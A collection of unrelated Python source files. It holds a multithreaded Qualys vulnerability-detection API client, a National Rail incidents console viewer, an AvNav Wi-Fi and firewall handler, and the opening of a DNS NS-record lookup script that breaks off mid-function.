str(err), logLevel = ERROR) return str(e) logHandler.dynamicLogger("Parsed %d Host entries. Logged=%d" % (total, logged)) self.remaining -= self.config.chunkSize self.completed += self.config.chunkSize return response def _process_root_element(self, elem): """Method used to parse and gather statistics on data retrieved. 
:param elem: XML element from iter(ET.iterparse()) :return: True or False depending on successful parsing """ host_fields_to_log = [ 'ID', 'IP', 'TRACKING_METHOD', 'DNS', 'NETBIOS', 'OS', 'LAST_SCAN_DATETIME', 'TAGS'] detection_fields_to_log = [ 'QID', 'TYPE', 'PORT', 'PROTOCOL', 'SSL', 'STATUS', 'LAST_UPDATE_DATETIME', 'LAST_FOUND_DATETIME', 'FIRST_FOUND_DATETIME', 'LAST_TEST_DATETIME'] fields_to_encode = ['OS', 'DNS', 'NETBIOS'] if elem.tag == "HOST": plugin_output = [] host_summary = [] vulns_by_type = { 'POTENTIAL': 0, 'CONFIRMED': 0 } vulns_by_status = { 'ACTIVE' : 0, 'NEW' : 0, 'FIXED' : 0, 'RE-OPENED': 0 } vulns_by_severity = {} other_stats = {} host_vuln_count = 0 host_id = None for sub_ele in list(elem): name = sub_ele.tag if name == "ID": host_id = sub_ele.text name = "HOST_ID" host_summary.append("HOST_ID=" + host_id) if name in host_fields_to_log: if name == "TAGS": host_tags = [] tag_elements = sub_ele.findall('./TAG/NAME') for tag_element in list(tag_elements): host_tags.append(tag_element.text) val = ",".join(host_tags) else: val = sub_ele.text if name in fields_to_encode: val = val.encode('utf-8') host_summary.append("%s=\"%s\"" % (name, val)) if not host_id: logHandler.dynamicLogger("Unable to find host_id", logLevel = 'error') return False host_line = ", ".join(host_summary) dl = elem.find('DETECTION_LIST') if dl is not None: for detection in list(dl): vuln_summary = [] qid_node = detection.find('QID') if qid_node is not None: host_vuln_count += 1 qid = int(qid_node.text) type = detection.find('TYPE').text.upper() status_element = detection.find('STATUS') if status_element is not None: status = detection.find('STATUS').text.upper() else: status = "-" severity = detection.find('SEVERITY') if severity is not None: severity = severity.text # else: # severity = self.get_qid_severity(qid) if severity: severity_key = 'SEVERITY_%s' % severity vuln_summary.append('SEVERITY=%s' % severity) vulns_by_severity[severity_key] = vulns_by_severity.get( severity_key, 0) + 1 if self.collect_advanced_host_summary: # Break down, count of vulns by each severity # and each status, type type_severity_key = '%s_%s' % ( type, severity_key) status_severity_key = '%s_%s' % ( status, severity_key) other_stats[type_severity_key] = other_stats.get( type_severity_key, 0) + 1 other_stats[status_severity_key] = other_stats.get( status_severity_key, 0) + 1 for sub_ele in list(detection): name = sub_ele.tag val = sub_ele.text.upper() if name == 'TYPE': vulns_by_type[val] = vulns_by_type.get( val, 0) + 1 if name == 'STATUS': vulns_by_status[val] = vulns_by_status.get( val, 0) + 1 if name in detection_fields_to_log: vuln_summary.append("%s=\"%s\"" % (name, val)) if self.log_host_detections: host_id_line = "HOSTVULN: " if not self.log_host_details_in_detection: host_id_line = "HOSTVULN: HOST_ID=%s," % host_id else: host_id_line = "HOSTVULN: %s," % host_line if self.seed_file_enabled: logHandler.dynamicLogger( "%s %s" % (host_id_line, ", ".join(vuln_summary))) if self.log_host_summary: host_summary = [ "HOSTSUMMARY: %s" % host_line, self.get_log_line_from_dict(vulns_by_severity), self.get_log_line_from_dict(vulns_by_type), self.get_log_line_from_dict(vulns_by_status)] if self.collect_advanced_host_summary: host_summary.append( self.get_log_line_from_dict(other_stats)) if plugin_output: host_summary.append(", ".join(plugin_output)) host_summary.append("TOTAL_VULNS=%s" % host_vuln_count) if self.seed_file_enabled: logHandler.dynamicLogger(", ".join(host_summary)) self.host_logged += 1 return True @staticmethod 
def get_log_line_from_dict(dict_obj): return ', '.join("%s=%r" % (key, val) for (key, val) in dict_obj.items()) def assets_coordinator(self, assets_idset_queue): """This method is entry point of each asset download thread. It pops out an id range entry from assets queue, and calls download_assets method passing id range as argument. :param assets_idset_queue: Queue object """ keep_running = True while keep_running: try: logHandler.dynamicLogger("Getting id set from assets_idset_queue") id_range = assets_idset_queue.get(False) logHandler.dynamicLogger("Processing id set: {idrange}", idrange = id_range) self.download_assets(id_range) assets_idset_queue.task_done() except queue.Empty: logHandler.dynamicLogger("assets_idset_queue is empty. Exiting.") keep_running = False def download_assets(self, ids): """This method will invoke call_api method for asset/host API.""" api_route = '/api/2.0/fo/asset/host/' params = dict( action = 'list', echo_request = 1, details = 'All/AGs', ids = ids, truncation_limit = 5000 ) batch = 1 logHandler.dynamicLogger("Downloading assets data..") keep_running = True while keep_running: filename = self.config.outputDir + "/assets/assets_Range-%s_Proc-%s_%s_Batch-%d.xml" % ( ids, os.getpid(), current_thread().getName(), batch) response = self.get( self.config.baseURL + api_route, params, response = XMLFileBufferedResponse(file_name = filename, logger = logHandler)) logHandler.dynamicLogger( "Wrote API response to {filename}", filename = filename) logHandler.dynamicLogger("Parsing response XML...") tree = ET.parse(filename) root = tree.getroot() response_element = root.find('RESPONSE') if response_element is None: logHandler.dynamicLogger( "RESPONSE tag not found in {filename}. Please check the file.", filename = filename) keep_running = False warning_element = response_element.find('WARNING') if warning_element is None: logHandler.dynamicLogger("End of pagination for ids {ids}", ids = ids) keep_running = False else: next_page_url = warning_element.find('URL').text params = utils.get_params_from_url(url = next_page_url) batch += 1 def checkLimits(self): """Check the current subscription API limits to ensure we dont start too many threads """ limits = { 'x-concurrency-limit-limit' : APIResponse.responseHeaders.get('X-Concurrency-Limit-Limit', "0"), 'x-ratelimit-remaining' : APIResponse.responseHeaders.get('X-RateLimit-Remaining', "0"), 'x-concurrency-limit-running': APIResponse.responseHeaders.get('X-Concurrency-Limit-Running', "0"), 'x-ratelimit-window-sec' : APIResponse.responseHeaders.get('X-RateLimit-Window-Sec', "0") } if int(limits.get('x-concurrency-limit-limit')) < self.config.numDetectionThreads: logHandler.dynamicLogger( 'Configured number of threads: {numthreads} is higher than subscription limit of ' 'x-concurrency-limit-limit: {limit}, Please verify subscription limits and reduce ' 'configured threads to use.', numthreads = self.config.numDetectionThreads, limit = int(limits.get('x-concurrency-limit-limit'))) exit() else: logHandler.dynamicLogger( 'Configured number of threads: {numthreads}, ' 'x-concurrency-limit-limit: {limit}, ', numthreads = self.config.numDetectionThreads, limit = int(limits.get('x-concurrency-limit-limit')) ) def startThreads(self, target = None, assetids = None, ThreadName = None, Queue = None, threadcount = 0): """ :param target: is the callable object to be invoked by the Thread.run() method. Defaults to None, meaning nothing is called. 
:param assetids: utils.IDset split into chunks for Enqueuing :param ThreadName: is the thread name. By default, a unique name is constructed in the form "Thread-N" where N is a small decimal number. :param Queue: Queue object. :param threadcount: Total number of threads to start. :return: Thread.__repr__ - list of Threads and their status """ workers = [] batchcnt = len(assetids) if batchcnt < threadcount: threadcount = batchcnt self.config.numDetectionThreads = batchcnt logHandler.dynamicLogger("Starting {numthreads} threads for {ThreadType} download. Total batches: {cnt} ...", numthreads = threadcount, ThreadType = ThreadName, cnt = batchcnt ) for id_chunk in assetids: id_range = id_chunk.tostring() queue.Queue.put(Queue, id_range) for i in range(0, threadcount): thread = Thread(target = target, name = ThreadName + '-' + str(i), args = (Queue,)) thread.setDaemon(True) thread.start() workers.append(thread) logHandler.dynamicLogger("Started {ThreadName} thread # {threadnum}", ThreadName = ThreadName, threadnum = i) return workers def execute(self): """Main method of this code.""" startTime = time.time() self.parse_options() assetWorkers = [] detectionWorkers = [] hostAssetWorkers = [] if self.downloadHostAssets: self.id_set = self.get_asset_ids_portal() else: self.id_set = self.get_asset_ids() logHandler.dynamicLogger(self.logMessages.message(GOTASSETSRESPONSE), numids = len(self.id_set), size = self.receivedBytes) self.total_hosts = self.remaining = len(self.id_set) ids = utils.IDSet() if self.config.pullbyip: for i in self.id_set: try: # skip invalid IPv4 addresses ipaddress.IPv4Address(str(i)) ipid = utils.ip2int(i) ids.addString(str(ipid)) except (AddressValueError, NetmaskValueError): continue else: for i in self.id_set: ids.addString(i) chunks = ids.split(self.config.chunkSize) if self.downloadAssets: assetWorkers = self.startThreads( threadcount = self.config.numAssetThreads, assetids = chunks, target = self.assets_coordinator, ThreadName = 'assetsThread', Queue = queue.Queue()) if self.downloadDetections: detectionWorkers = self.startThreads( threadcount = self.config.numDetectionThreads, assetids = chunks, target = self.vm_detection_coordinator, ThreadName = 'detectionThread', Queue = queue.Queue()) if self.downloadHostAssets: hostAssetWorkers = self.startThreads( threadcount = self.config.numHostAssetThreads, assetids = chunks, target = self.portal_assethost_coordinator, ThreadName = 'hostAssetThread', Queue = queue.Queue()) workers = assetWorkers + detectionWorkers + hostAssetWorkers # Block until all threads have completed for worker in workers: worker.join() duration = self.callDuration(startTime = startTime) logHandler.dynamicLogger(self.logMessages.message(TOTALDOWNLOADED), duration = duration, bytes = self.receivedBytes, speed = round(self.receivedBytes / duration / 1000, 2), hosts = self.host_logged, batchsize = self.config.chunkSize) def parse_options(self): """This method parses all options given in command line.""" username = None password = None fmt = Formatter() description = "Multithreading for Qualys Host Detection v2 API" epilog = "Examples:\n" \ "Using a batch size of 500 hosts, with 5 threads in parallel," \ " for all hosts processed since 2019-04-01:\n\n" \ "localhost:HostDetection testuser$ python qPyMultiThread.py -u quays_nw93 -c 500 -d 5 -v 2019-04-01\n" \ " QG Password:\n" \ " 2019-04-05 20:16:07-0700 INFO: [qPyMultiThread] Validating Credentials to " \ "https://qualysapi.qualys.com/msp/about.php ...\n" \ " 2019-04-05 20:16:13-0700 INFO: [qPyMultiThread] 
Got response from Proxy, " \ "and msp/about.php endpoint...\n" \ " 2019-04-05 20:16:13-0700 INFO: [qPyMultiThread] Validation successful, " \ "proceeding. verifying limits\n" \ " \n\n" option = OptionParser(formatter = fmt, description = description, epilog = epilog) parser = OptionGroup(option, title = "Connection Options") parser.add_option("-s", dest = "baseURL", default = "https://qualysapi.qualys.com", help = "Qualys API Server. Defaults to US Platform 1") parser.add_option("-u", dest = "username", help = "Qualys API Username") parser.add_option("-p", dest = "password", help = "Qualys API Password") parser.add_option("-P", dest = "useProxy", default = False, help = "Enable/Disable using Proxy") parser.add_option("-x", dest = "proxyHost", default = 'None', help = "Proxy to use e.g http://localhost:3128") conf = OptionGroup(option, title = "Configuration Options") conf.add_option("-a", dest = "numAssetThreads", default = 0, help = "Number of threads to fetch host assets") conf.add_option("-d", dest = "numDetectionThreads", default = 0, help = "Number of threads to fetch host detections") conf.add_option("-z", dest = "numHostAssetThreads", default = 0, help = "Number of threads to fetch Portal HostAssets") conf.add_option("-v", dest = "detectionDelta", default = "2000-01-01", help = "Only pull Data scanned after this date.") conf.add_option("-c", dest = "chunkSize", default = 1000, help = "Batch size of Host ID chunks") conf.add_option("-i", dest = "pullbyip", default = False, action = 'store_false', help = "Enable pulling data by batches of IPs instead of host ids") conf.add_option("-D", dest = "debug", default = False, action = 'store_false', help = "Enable Debug Logging") option.add_option_group(parser) option.add_option_group(conf) (options, values) = option.parse_args() if len(sys.argv[1:]) == 0: option.print_help() exit(1) username = options.username password = options.password if username is None or username == '': username = raw_input("QG Username: ") if password is None or password == '': import getpass password = getpass.getpass("QG Password:") self.config = Configuration( username = username, password = password, baseURL = options.baseURL, useProxy = options.useProxy, proxyHost = options.proxyHost, validateURL = '/msp/about.php', numAssetThreads = int(options.numAssetThreads), numDetectionThreads = int(options.numDetectionThreads), numHostAssetThreads = int(options.numHostAssetThreads), chunkSize = int(options.chunkSize), detectionDelta = options.detectionDelta, debug = options.debug, NoRetryCodes = NORETRYCODES, key = None, pullbyip = options.pullbyip, default_settings = None) if self.config.debug: logHandler.enableDebug(True) logHandler.enableLogger() logHandler.dynamicLogger('Debug logging enabled', logLevel = DEBUG) if self.config.useProxy is True: if self.config.proxyHost == 'None': raise CongifurationException("Please set the Proxy Host with -P or --proxy when using -x") try: tryproxy = self.validate() if tryproxy: logHandler.dynamicLogger("Proxy Check successful, proceeding.") else: logHandler.dynamicLogger("Proxy Check failed, exiting") exit() except Exception as e: raise Exception("Proxy Check Failed: %s" % e) if self.config.numAssetThreads >= 1: self.downloadAssets = True if self.config.numDetectionThreads >= 1: self.downloadDetections = True if self.config.numHostAssetThreads >= 1: self.downloadHostAssets = True if not self.downloadAssets and not self.downloadDetections and not self.downloadHostAssets: raise CongifurationException( "Please set at least one of -a / 
-d / -h option You haven't set any of them with valid value") try: v = self.validate() if v: logHandler.dynamicLogger("Validation successful, proceeding. verifying limits") self.checkLimits() else: exit() except Exception as e: import traceback logHandler.dynamicLogger( self.logMessages.message(TRACEUNEXPECTED), 'error', traceback = traceback.format_exc()) raise Exception("Validation Failed: %s" % e) if __name__ == "__main__": qapi = APIClient() qapi.execute()
main.py
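"""British Railways incidents console viewer.

Editor's summary (inferred from the code below): fetches the National Rail
incidents XML feed, lets the user pick one affected operator (or every line),
then refreshes every 10 seconds, printing the summary and description of each
uncleared incident with priority below 3, while a background thread keeps a
Europe/London clock on screen.
"""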
import requests import pytz import time import xml.etree.ElementTree as elementTree import os import threading from datetime import datetime from io import StringIO from html.parser import HTMLParser operators = [] class MLStripper(HTMLParser): def __init__(self): super().__init__() self.reset() self.strict = False self.convert_charrefs = True self.text = StringIO() def handle_data(self, d): self.text.write(d) def get_data(self): return self.text.getvalue() def strip_tags(html): s = MLStripper() s.feed(html) return s.get_data() def clear_console(): command = 'clear' if os.name in ('nt', 'dos'): # If Machine is running on Windows, use cls command = 'cls' os.system(command) def center_text(stri, size): if len(stri) >= size: return stri left = int((size - len(stri)) / 2) right = int(size - len(stri) - left) return left * "=" + stri + right * "=" def print_clock(): while True: london_time = datetime.now(pytz.timezone('Europe/London')) print("================", london_time.strftime("%H:%M:%S"), "================", end="\r") time.sleep(0.2) def main(): i = 0 clock = threading.Thread(target=print_clock) url = 'https://internal.nationalrail.co.uk/xml/5.0/incidents.xml' r = requests.get(url) incidents = elementTree.fromstring(r.content) for x in incidents.iter("{http://nationalrail.co.uk/xml/incident}PtIncident"): op_name = x.find("{http://nationalrail.co.uk/xml/incident}Affects").find( "{http://nationalrail.co.uk/xml/incident}Operators") \ .find("{http://nationalrail.co.uk/xml/incident}AffectedOperator"). \ find("{http://nationalrail.co.uk/xml/incident}OperatorName") if op_name.text not in operators: operators.append(op_name.text) # Choose affected carrier while True: clear_console() i = 0 for x in operators: i += 1 print(i, ") ", x, sep="") i += 1 print(i, ") Every line", sep="") print("================================================================") print("Enter the carrier number to see the disruptions that affect it: ", end="") x = int(input()) if 0 < x <= i: if x is i: op_name = "" else: op_name = operators[x - 1] break # Start clock clock.start() while True: # Pull XML from server r = requests.get(url) incidents = elementTree.fromstring(r.content) # Clear screen and print console header clear_console() print(" BRITISH RAILWAYS INCIDENTS APP") print("============ Affected lines ==============") print() # Iterate every accident for x in incidents.iter("{http://nationalrail.co.uk/xml/incident}PtIncident"): priority = int(x.find("{http://nationalrail.co.uk/xml/incident}IncidentPriority").text) cleared = x.find("{http://nationalrail.co.uk/xml/incident}ClearedIncident") operator = x.find("{http://nationalrail.co.uk/xml/incident}Affects").find( "{http://nationalrail.co.uk/xml/incident}Operators") \ .find("{http://nationalrail.co.uk/xml/incident}AffectedOperator"). 
\ find("{http://nationalrail.co.uk/xml/incident}OperatorName").text if cleared is not None: cleared = cleared.text else: cleared = "false" # Print info only when priority is high and accident isn't cleared if cleared == "false" and priority < 3 and (operator == op_name or op_name == ""): routes = x.find("{http://nationalrail.co.uk/xml/incident}Affects").find( "{http://nationalrail.co.uk/xml/incident}RoutesAffected") summary = x.find("{http://nationalrail.co.uk/xml/incident}Summary") description = x.find("{http://nationalrail.co.uk/xml/incident}Description") if description is not None and summary is not None: print(center_text(strip_tags(summary.text), 100)) print("\tDESCRIPTION: ", strip_tags(description.text)) print() print() # Sleep 10s time.sleep(10) # Increase counter i += 1 if __name__ == "__main__": main()
wpahandler.py
# -*- coding: utf-8 -*- # vim: ts=2 sw=2 et ai ############################################################################### # Copyright (c) 2012,2021 Andreas Vogel andreas@wellenvogel.net # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. # # parts from this software (AIS decoding) are taken from the gpsd project # so refer to this BSD licencse also (see ais.py) or omit ais.py ############################################################################### import json import time import avnav_handlerList from avnav_manager import AVNHandlerManager from avnav_util import * from avnav_worker import * from wpa_control import WpaControl class FwInfo(object): def __init__(self,ssid,mode,status): self.ssid=ssid self.mode=mode self.status=status #a handler to set up a wpa claient class AVNWpaHandler(AVNWorker): PRIVATE_NAME = "wlan-internal" #name to be set as id_str for wlans that should allow incoming traffic P_FWCOMMAND="firewallCommand" COMMAND_REPEAT=10 #10 seconds for repeat on error COMMAND_REPEAT_OK=1800 #30 minutes for repeat on ok def __init__(self,param): AVNWorker.__init__(self, param) self.wpaHandler=None self.lastScan=datetime.datetime.utcnow() self.scanLock=threading.Lock() self.getRequestParam=AVNUtil.getHttpRequestParam self.commandHandler = None self.lastFwInfo=None @classmethod def getConfigName(cls): return "AVNWpaHandler" @classmethod def getConfigParam(cls, child=None): if child is not None: return None return { 'ownSocket':'/tmp/avnav-wpa-ctrl', #my own socket endpoint 'wpaSocket':"/var/run/wpa_supplicant/wlan-av1", #the wpa control socket 'ownSsid':'avnav,avnav1,avnav2', #cls.P_FWCOMMAND': '', cls.P_FWCOMMAND:'sudo -n $BASEDIR/../raspberry/iptables-ext.sh wlan-av1' } @classmethod def preventMultiInstance(cls): return True def run(self): self.commandHandler = self.findHandlerByName("AVNCommandHandler") wpaSocket=self.getStringParam('wpaSocket') ownSocket=self.getStringParam('ownSocket') watcherThread=threading.Thread(target=self.allowDenyWatcher,name="firewallWatcher") watcherThread.start() while True: try: newWpaSocket=self.getStringParam('wpaSocket') if newWpaSocket != wpaSocket: if self.wpaHandler is not None: self.wpaHandler.close(False) self.wpaHandler=None wpaSocket=newWpaSocket if os.path.exists(wpaSocket): AVNLog.debug("wpa socket %s exists, checking handler", wpaSocket) if self.wpaHandler is None: AVNLog.info("connecting to wpa_supplicant %s",wpaSocket) self.wpaHandler=WpaControl(wpaSocket,ownSocket) self.wpaHandler.open() self.setInfo('main','connected to 
%s'%(wpaSocket),WorkerStatus.STARTED) else: try: self.wpaHandler.checkOpen() except: AVNLog.error("wpa handler closed...") self.wpaHandler=None else: AVNLog.debug("wpa socket %s does not exist",wpaSocket) if self.wpaHandler is not None: self.wpaHandler.close(False) self.wpaHandler=None AVNLog.info("disconnecting from wpa_supplicant %s",wpaSocket) self.setInfo('main','disconnected from %s'%(wpaSocket),WorkerStatus.INACTIVE) time.sleep(5) continue #we should have an active wpa handler here... #todo: cache scan results here except Exception as e: AVNLog.error("exception in WPAHandler: %s",traceback.format_exc()) pass time.sleep(5) def allowDenyWatcher(self): """ checks for the current active LAN to have id_str="wlan-internal" and open the firewall in this case using the allowDenyCommand @return: """ statusName="FwHandler" cmd=self.getStringParam(self.P_FWCOMMAND) if cmd is None or cmd == "": self.setInfo(statusName, "no command", WorkerStatus.INACTIVE) return cmdparam=cmd.split(" ") command=[] for par in cmdparam: command.append(AVNUtil.replaceParam(par, AVNHandlerManager.filterBaseParam(self.getParam()))) self.setInfo(statusName,"running",WorkerStatus.NMEA) lastNet=None lastMode=None lastResult=-1 lastSuccess=AVNUtil.utcnow() while True: try: status=self.getStatus() if status.get('wpa_state') is not None and status.get('wpa_state') == 'COMPLETED': ssid=status.get('ssid') mode="deny" if status.get('id_str') is not None and status.get('id_str') == self.PRIVATE_NAME: mode="allow" waittime=0 if lastMode == mode and lastNet == ssid: if lastResult != 0: waittime=self.COMMAND_REPEAT else: waittime=self.COMMAND_REPEAT_OK if (AVNUtil.utcnow() - lastSuccess) >= waittime: lastNet=ssid lastMode=mode AVNLog.info("running command %s %s",command,mode) lastResult=AVNUtil.runCommand(command+[mode],statusName+"-command") if lastResult != 0: if lastResult is None: lastResult=-1 AVNLog.error("%s: unable to run firewall command on %s for mode %s, return %d"%(statusName,ssid,mode,lastResult)) self.setInfo(statusName,"unable to run firewall command on %s for %s, return %d"%(ssid,mode,lastResult),WorkerStatus.ERROR) else: self.setInfo(statusName, "firewall command on %s for %s ok" % (ssid,mode), WorkerStatus.NMEA) lastSuccess=AVNUtil.utcnow() self.lastFwInfo=FwInfo(ssid,mode,lastResult) except: AVNLog.error("%s: exception %s"%(statusName,traceback.format_exc())) time.sleep(5) def startScan(self): if self.wpaHandler is None: return self.scanLock.acquire() now=datetime.datetime.utcnow() if now > (self.lastScan + datetime.timedelta(seconds=30)): AVNLog.debug("wpa start scan") self.lastScan=now self.scanLock.release() self.wpaHandler.startScan() return self.scanLock.release() def getList(self): AVNLog.debug("wpa getList") rt=[] wpaHandler=self.wpaHandler if wpaHandler is None: return rt try: self.startScan() except: AVNLog.error("exception in WPAHandler:getList: %s",traceback.format_exc()) try: list=wpaHandler.scanResultWithInfo() ownSSid=self.getStringParam('ownSsid') #remove own ssid for net in list: netSsid=net.get('ssid') if ownSSid is not None and ownSSid != "": if netSsid is not None and netSsid in ownSSid.split(","): continue id_str=net.get('id_str') if id_str is not None and id_str == self.PRIVATE_NAME: net['allowAccess']=True rt.append(net) AVNLog.debug("wpa list %s",rt) return rt except Exception: AVNLog.error("exception in WPAHandler:getList: %s",traceback.format_exc()) return rt def removeNetwork(self,id): rt={'status':'no WLAN'} wpaHandler=self.wpaHandler if wpaHandler is None: return rt try: 
AVNLog.debug("wpa remove network",id) wpaHandler.removeNetwork(id) wpaHandler.saveConfig() return {'status':'OK'} except Exception as e: AVNLog.error("exception in WPAHandler:removeNetwork: %s",traceback.format_exc()) return {'status':'commandError','info':str(e)} def enableNetwork(self,id,param=None): rt={'status':'no WLAN'} wpaHandler=self.wpaHandler if wpaHandler is None: return rt try: AVNLog.debug("wpa enable network",id) if param is not None: self.wpaHandler.configureNetwork(id,param) wpaHandler.enableNetwork(id) wpaHandler.saveConfig() return {'status':'OK'} except Exception as e: AVNLog.error("exception in WPAHandler:enableNetwork: %s",traceback.format_exc()) return {'status':'commandError','info':str(e)} def disableNetwork(self,id): rt={'status':'no WLAN'} wpaHandler=self.wpaHandler if wpaHandler is None: return rt try: AVNLog.debug("wpa disable network",id) wpaHandler.disableNetwork(id) wpaHandler.saveConfig() return {'status':'OK'} except Exception as e: AVNLog.error("exception in WPAHandler:disableNetwork: %s",traceback.format_exc()) return {'status':'commandError','info':str(e)} def connect(self,param): rt={'status':'no WLAN'} wpaHandler=self.wpaHandler if wpaHandler is None: return rt try: AVNLog.debug("wpa connect",param) wpaHandler.connect(param) wpaHandler.saveConfig() return {'status':'OK'} except Exception as e: AVNLog.error("exception in WPAHandler:connect: %s",traceback.format_exc()) return {'status':'commandError','info':str(e)} def getStatus(self): rt={'wpa_state':'OFFLINE'} wpaHandler=self.wpaHandler if wpaHandler is None: return rt try: rt=wpaHandler.status() if rt.get('id_str') is not None and rt.get('id_str') == self.PRIVATE_NAME: rt['allowAccess']=True hasFwResult=False if self.lastFwInfo is not None: if self.lastFwInfo.ssid == rt.get('ssid'): rt['fwStatus']=self.lastFwInfo.status rt['fwMode']=self.lastFwInfo.mode hasFwResult=True if not hasFwResult: rt['fwStatus']=-1 AVNLog.debug("wpa status",rt) return rt except Exception: AVNLog.error("exception in WPAHandler:getStatus: %s",traceback.format_exc()) return {'wpa_state':'COMMANDERROR'} def getHandledCommands(self): return "wpa" def safeInt(self,val): try: return int(val) except: return None def handleApiRequest(self,type,subtype,requestparam,**kwargs): start=datetime.datetime.utcnow() command=self.getRequestParam(requestparam, 'command') AVNLog.debug("wpa api request %s",command) rt=None if command is None: raise Exception('missing command for wpa request') if command == 'list': rt=json.dumps(self.getList()) if command == 'status': rt=json.dumps(self.getStatus()) if command == 'all': cmd=self.getStringParam(self.P_FWCOMMAND) rt={'status':self.getStatus(),'list':self.getList()} if cmd is not None and cmd != "": rt['showAccess']=True rt=json.dumps(rt) if command == 'enable': id=self.getRequestParam(requestparam,'id') updateParam={} psk=self.getRequestParam(requestparam,'psk') if psk is not None and psk != "": updateParam['psk']=psk allowAccess=self.getRequestParam(requestparam,'allowAccess') if allowAccess is not None and allowAccess == 'true': updateParam['id_str']=self.PRIVATE_NAME else: updateParam['id_str']='' rt=json.dumps(self.enableNetwork(id,updateParam)) if command == 'disable': id=self.getRequestParam(requestparam,'id') rt=json.dumps(self.disableNetwork(id)) if command == 'remove': id=self.getRequestParam(requestparam,'id') rt=json.dumps(self.removeNetwork(id)) if command == 'connect': param={} for k in ['ssid','psk']: v=self.getRequestParam(requestparam,k) if v is not None and v != "": param[k]=v 
key=self.getRequestParam(requestparam,"psk") id = self.getRequestParam(requestparam, 'id') if ( key is None or key == "" ) and ( id is None or self.safeInt(id) < 0) : param['key_mgmt'] = "NONE" else: param['key_mgmt'] = "WPA-PSK" allowAccess=self.getRequestParam(requestparam,'allowAccess') if allowAccess is not None and allowAccess == 'true': param['id_str']=self.PRIVATE_NAME else: param['id_str'] = '' rt=json.dumps(self.connect(param)) if rt is None: raise Exception("unknown command %s"%(command)) end=datetime.datetime.utcnow() AVNLog.debug("wpa request %s lasted %d millis",command,(end-start).total_seconds()*1000) return rt avnav_handlerList.registerHandler(AVNWpaHandler)
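

# ---------------------------------------------------------------------------
# Editor's note (illustrative sketch, not part of the handler): allowDenyWatcher
# re-runs the firewall command immediately when the connected SSID or the
# allow/deny mode changes, and otherwise only once COMMAND_REPEAT seconds
# (last run failed) or COMMAND_REPEAT_OK seconds (last run succeeded) have
# passed since the last successful run. The hypothetical predicate below just
# restates that decision in one place:
def _example_should_rerun_fw(ssid, mode, last_ssid, last_mode,
                             last_result, seconds_since_success):
  if ssid != last_ssid or mode != last_mode:
    return True
  wait = (AVNWpaHandler.COMMAND_REPEAT if last_result != 0
          else AVNWpaHandler.COMMAND_REPEAT_OK)
  return seconds_since_success >= wait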
obtaining_domain_ns_realtime.py
# encoding:utf-8 """ 分别向顶级域名的权威和DNS递归服务器查询域名的NS记录,并且批量更新 注意:使用两种方法获取域名的NS记录,因为不同方法都无法获取完整的NS记录 """ import sys reload(sys) sys.setdefaultencoding('utf-8') sys.path.append('../') import threading import time import random import datetime import hashlib from Queue import Queue from threading import Thread from collections import defaultdict from resolving_domain_ns_by_tld import get_domain_ns_hierarchical_dns # 获取域名dns from db_manage.data_base import MySQL from db_manage.mysql_config import SOURCE_CONFIG_LOCAL as SOURCE_CONFIG import tldextract from resolving_domain_ns_by_ns import query_domain_ns_by_ns # 获取域名dns from resolving_ip_cname_by_ns import query_ip_cname_by_ns from Logger import Logger from task_confirm import TaskConfirm domain_ns_result = {} # 存储最终的ns结果 retry_domains = [] # 存储需要进行二次探测的域名及其主域名 thread_num = 50 # 主线程数量 retry_thread_num = 20 # 次级线程数量 queue = Queue() # 任务队列 logger = Logger(file_path='./log/',show_terminal=True) # 日志配置 class NSubThread(threading.Thread): """自定义线程类,用于返回结果""" def __init__(self,func,args=()): super(NSubThread, self).__init__() self.func = func self.args = args def run(self): self.result = self.func(*self.args) def get_result(self): try: return self.result # 如果子线程不使用join方法,此处可能会报没有self.result的错误 except Exception,e: logger.logger.error('获取线程的结果失败:',str(e)) return [], 'FALSE' def read_domains(file_name): """ 读取域名存储文件,获取要探测的域名,以及提取出主域名 注意:若是不符合规范的域名,则丢弃 """ domains = [] main_domains = [] no_fetch_extract = tldextract.TLDExtract(suffix_list_urls=None) with open(file_name,'r') as fp: for d in fp.readlines(): domain_tld = no_fetch_extract(d.strip()) tld, reg_domain = domain_tld.suffix, domain_tld.domain # 提取出顶级域名和主域名部分 if tld and reg_domain: main_domains.append(reg_domain+'.'+tld) domains.append(d.strip()) else: logger.logger.warning('域名%s不符合规范,不进行探测' % d.strip()) return domains, main_domains def insert_domains_db(domains): """将域名插入到数据库中""" try: db = MySQL(SOURCE_CONFIG) except Exception,e: logger.logger.error(e) return False for domain in domains: sql = 'insert ignore into focused_domain (domain) values ("%s")' % (domain) db.insert_no_commit(sql) db.commit() db.close() return True def extract_domain_tld(domain): """ 提取域名的顶级域名 注意:不符合规范的域名,返回为空 """ no_fetch_extract = tldextract.TLDExtract(suffix_list_urls=None) domain_tld = no_fetch_extract(domain) tld = domain_tld.suffix if '.' 
